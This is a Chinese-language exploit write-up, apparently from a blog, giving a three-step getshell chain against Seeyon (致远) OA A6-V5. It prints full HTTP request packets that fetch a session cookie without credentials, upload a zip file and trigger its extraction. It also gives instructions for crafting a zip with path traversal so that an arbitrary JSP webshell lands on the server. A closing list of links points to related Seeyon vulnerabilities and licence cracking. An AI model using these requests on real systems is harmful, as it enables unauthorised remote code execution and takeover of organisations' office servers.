致远OA 组合getshell
致远OA通杀 最新组合getshell
复现版本:
致远A6-V5协同管理软件.A6 V7.1SP1
Getshell 分三步
1.获取cookie信息
2.上传压缩文件
3.解压压缩文件得到shell
1.获取 cookie
漏洞地址
/seeyon/thirdpartyController.do
数据包:
POST /seeyon/thirdpartyController.do HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
获取到 cookie
2.上传压缩文件
漏洞点:
/seeyon/fileUpload.do?method=processUpload&maxSize=
数据包:
更换cookie
POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 更新的cookie
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1416682316313
Content-Length: 1715-----------------------------1416682316313
Content-Disposition: form-data; name="type"-----------------------------1416682316313
Content-Disposition: form-data; name="extensions"-----------------------------1416682316313
Content-Disposition: form-data; name="applicationCategory"-----------------------------1416682316313
Content-Disposition: form-data; name="destDirectory"-----------------------------1416682316313
Content-Disposition: form-data; name="destFilename"-----------------------------1416682316313
Content-Disposition: form-data; name="maxSize"-----------------------------1416682316313
Content-Disposition: form-data; name="isEncrypt"-----------------------------1416682316313
Content-Disposition: form-data; name="file1"; filename="test1.zip"
Content-Type: application/x-zip-compressedzip
-----------------------------1416682316313--
3.解压压缩文件
解压文件得到 shell
漏洞地址
/seeyon/ajax.do
数据包:
POST /seeyon/ajax.do HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 更新的cookie
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 142method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2021-04-14","-6482922226625199575"]
image
达成目的
访问压缩包里的文件进行验证 解压后文件位置位于
/seeyon/common/designer/pageLayout/压缩包里文件名
制作 zip 文件
layout.xml 必须存在否则在利用解压漏洞时会解压失败空内容即可
shell.jsp 可是任意名称与内容
压缩成 zip 文件
使用文本编辑 zip 包把 shell 文件名前三位替换成 ..\
修改前和修改后位数不能变否则 zip 文件损坏
两个地方都要该
致远OA 组合getshell相关推荐
- 致远a8-v5-6.0协同管理软件_高危漏洞利用预警:近期利用“致远OA任意文件写入漏洞”的攻击较多...
概述腾讯御界高级威胁检测系统近期监测到"致远OA系统上的GetShell漏洞"在网上被频繁利用攻击政企客户. 对于存在漏洞的OA系统,攻击者无需任何权限,即可向服务器上传websh ...
- 致远OA任意文件下载漏洞(CNVD-2020-62422)
文章目录 漏洞描述 影响版本 payload poc 漏洞复现 修复补丁 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 影响版本 致远OA A6-V5 致远OA ...
- 致远oa服务器端口怎么修改,致远oa服务器设置
致远oa服务器设置 内容精选 换一换 云耀云服务器创建成功后,您可以根据需求,修改云服务器的名称.系统支持批量修改多台云耀云服务器的名称,修改完成后,这些云耀云服务器的名称相同.登录控制台.单击管理控 ...
- 致远OA管理员密码的重置
管理员账号忘记了,然后致远OA的运维服务也到期了,怎么办? 求人不如求自己,我们来看看到底怎么修改相关的管理员密码吧. 注意一:更新后需要重启OA应用方可生效. 注意二:更新后的密码是OA系统预设密码 ...
- 致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现
为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 利用方式 04 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.致远OA wpsAssistServ ...
- 致远OA表单自定义函数(计算N年后今天的日期 )
需求背景 看到这个标题,可能好些人懵了,N年后的今天这么简单,还需要计算么? 的确,人脑算很简单,但是咱们的表单中-- 前日,有人跟大表哥来电,就说客户要根据档案的归档日期和保存年限,自动计算出档案的 ...
- 致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现
为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 验证方式 04 利用方式 05 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.由于致远OA旧版本某 ...
- 致远OA破解思路,致远协同办公OA破解思路
文章目录 前言 一.选择那种方式破解? 1.破解加密文件 2.破解class类 三.破解过程 四.成果展示 总结 前言 致远OA实施过程中需要在测试环境中进行测试,但是申请的测试狗过期了,怎么办?修改 ...
- 致远OA A8V5 A6V5 V8.2 8.1 8.0 V7 V6 V5 V3补丁
致远OA A8V5 A6V5 V8.2 8.1 8.0 V7 V6 V5 V3补丁
- 致远OA 文件上传漏洞
报告编号:B6-2021-010801 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-08 0x01漏洞简述 2021年01月08日,360CERT监测发现致远OA发布 ...
最新文章
- 微信支付android不弹出支付密码窗口,微信支付没弹出支付窗口
- Console-算法-一个偶数总能表示为两个素数之和
- linux命令:返回上一次目录
- linux常见系统目录,Linux系统中常见目录有哪些?linux运维学习中心
- Java中的一直不能掌握的switch-case语句
- python如何读取配置文件获取url以及hhead_python爬虫小工具:(模块:copyhreaders,直接复制头文件,无须挨个添加双引号)...
- protoc: error while loading shared libraries: libprotoc.so.8: cannot open shared object file
- SAP Spartacus table里显示较长数据时自动显示省略号的设置
- react笔记组件属性传递机制(四)
- 软件测试过程中的度量与分析
- JFinal源码解析--从请求到处理返回流程
- oracle学习札记72
- JS 字符串变量全局替换
- 三阶段最小二乘法 回归分析 3SLS stata实现
- Zepto中touch模块的使用(移动端)
- 南京美食,为吃遍天下做准备~~
- Android camera2对焦设置
- android出生日期计算年龄,Java 通过生日计算宝宝多大了,输出我27岁7月零9天
- 华为HarmonyOS鸿蒙系统介绍,华为鸿蒙OS系统怎么样 华为HarmonyOS鸿蒙系统介绍
- 【渝粤教育】广东开放大学 土木工程测量 形成性考核 (45)